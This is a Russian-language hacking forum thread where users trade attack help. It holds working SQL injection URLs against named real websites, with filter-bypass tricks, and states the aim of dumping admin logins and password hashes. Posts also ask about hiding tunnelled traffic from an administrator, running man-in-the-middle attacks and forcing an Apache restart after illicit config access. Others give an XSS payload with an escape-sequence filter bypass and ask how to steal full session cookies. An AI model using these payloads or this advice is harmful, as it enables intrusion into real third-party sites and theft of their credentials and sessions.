http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+and+1=1+order+by+1--+ в общем дальше я ниxуя не понимаю, помогите с этим, где я допустил ошибку и как вытащить логин и хеш админа
как незаметно для админа сервера тунелировать весь траф. Через прокси или тому подобное. 1.задача проведения атаки человек посередине. 2.как узнать пароль от веб сервера (apach виндовый) локально.
Да, у меня тоже( С помощью хавиж достал, но только логины А тут как: http://www.incornea.com.co/index.php?option=com_wrapper&view=wrapper&Itemid=3 http://loteriadebogota.com/html/index.php?option=com_wrapper&view=wrapper&Itemid=15 А по поводу http://super.com.co, попробуйте, может у кого откроется, нужны хеши
Прикольно =) Code: http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+group+by+11# При union+select сайт зависает. А при union(select(1),2,3,4,5,6,7,8,9,10,11) не зависает, но false. При uniunionon, selselectect так же false. Поэтому: Code: http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+and+substring((select+version()),1,1)=5+and+'1'='1 =) А что помешало достать пароли? Com_wrapper, даже смотреть не буду
Возникла следующая ситуация: Есть не рут доступ, но httpd.conf доступен на запись. Как принудительно ребутнуть апач (или перепрочитать конфиги) , если на "service httpd graceful" не хватает прав? может кто сталкивался... грубо говоря нужно заставить его самого перезагрузиться из вне.
Code: Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /var/www/xxx.ru/www/lib/core.php on line 18 а возможно как то раскрутить или это просто вывод инфы?
session_start выплевывает ворнинг в случае, если передан некорректный идентификатор сессии(довольно часто встречающиеся раскрытие) https://rdot.org/forum/showpost.php?p=23631&postcount=1855 лечится простой заглушкой @session_start();
Зависит от того, где будет вывод кода на странице. В этом примере твоя фильтрация не поможет: PHP: ... <script> ... document.write('<img src="http://site.com/images/avatar/<?php echo(anti_xss($_GET['user_id'])) ?>.gif" />'); ... </script> ... Вектор атаки мог выглядеть так: http://site.com/show.php?user_id="onerror="alert('XSS');// Результат: PHP: <img src="http://site.com/images/avatar/"onerror="alert('XSS');//.gif" />' Из-за фильтра это сделать не получится. Но так как вывод в данном случае внутри строки JS, мы можем использовать escape-последовательности \x или \u для обхода фильтра: http://site.com/show.php?user_id=\x22\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x22\x61\x6C\x65\x72\x74\x28\x27\x58\x53\x53\x27\x29\x3B\x2F\x2F P.S.: Это не просто просто пример, придуманный мной. Подобный код встречается в крупнейших почтовых сервисах и соц.сетях.
Кто нибудь объясните же мне, наконец! Раньше спокойно юзал активную xss, куки приходили в полном объёме.Вот к примеру: HTML: SESSd9cc53338c9b7991787e099f00cbe150=hpl0badg2frcecella6toj9kn1; authcache=886e35; drupal_user=*****; drupal_uid=961; __utma=50912437.1205324149.1316182441.1330256374.1330260320.747; __utmb=50912437.500.10.1330260320; __utmc=50912437; __utmz=50912437.1330260320.747.249.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not provided); hotlog=1; DRUPAL_UID=961; has_js=1 Теперь приходят какие то объедки HTML: __utma=50912437.727943270.1327681550.1339957378.1339957644.261; __utmb=50912437.7.10.1339957644; __utmc=50912437; __utmz=50912437.1339957644.261.5.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=******* регистрация; __cfduid=d00e1872cac587b88ebc65d3c4eba687d1338303786; b=b; hotlog=1; b=b Где SESSID?Где drupal_user?Без них подменная не возможна. Если ввести HTML: <script>javascript:alert(document.cookie)</script> то мы получим такую же лабуду без SESSID и т.д.Ладно, попробуем просмотреть куки через браузер(в данном случае Mozilla) Инстурменты->Информация о странице-> Просмотреть куки и-о чудо!Всё на месте, SESSID и т.д. Так как же быть?Если даже через обычный скрипт HTML: <script>javascript:alert(document.cookie)</script> нельзя полностью просмотреть куки Да, возможно у меня квадратный мозг, а эту проблему может решить полный нуб.И всё же, объясните мне, идиоту, как полностью своровать куки
у нужных тебе куков установлен флаг HttpOnly . Проблему решит метод TRACE, но на практике почти не юзается.
Ребят, http://tools.phxglobal.com/articles.php?id=-39%20or%201=1 работает но не кидает ошибок - подскажите как решить...
http://m-kat.ru/info.php?search=1'uniololon+seololect+1,2http://bit.ly/MAt6Af,3,4,5и тут ещё что-нибудь напишу,6--+
Code: http://m-kat.ru/info.php?search='and(select+1+from(select+count(*),concat(([COLOR=Red]select+table_name+from+information_schema.tables+limit+0,1[/COLOR]),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+g
Подставил правильное имя таблицы - запрос матерится - не пойму на что... http://www.vs.com.ua/a-news/news.php?id=-1+UNION+SELECT+1,2,3,4,5,COLUMN_NAME,7,8,9,10+FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=aadm_users+LIMIT+0,1+--+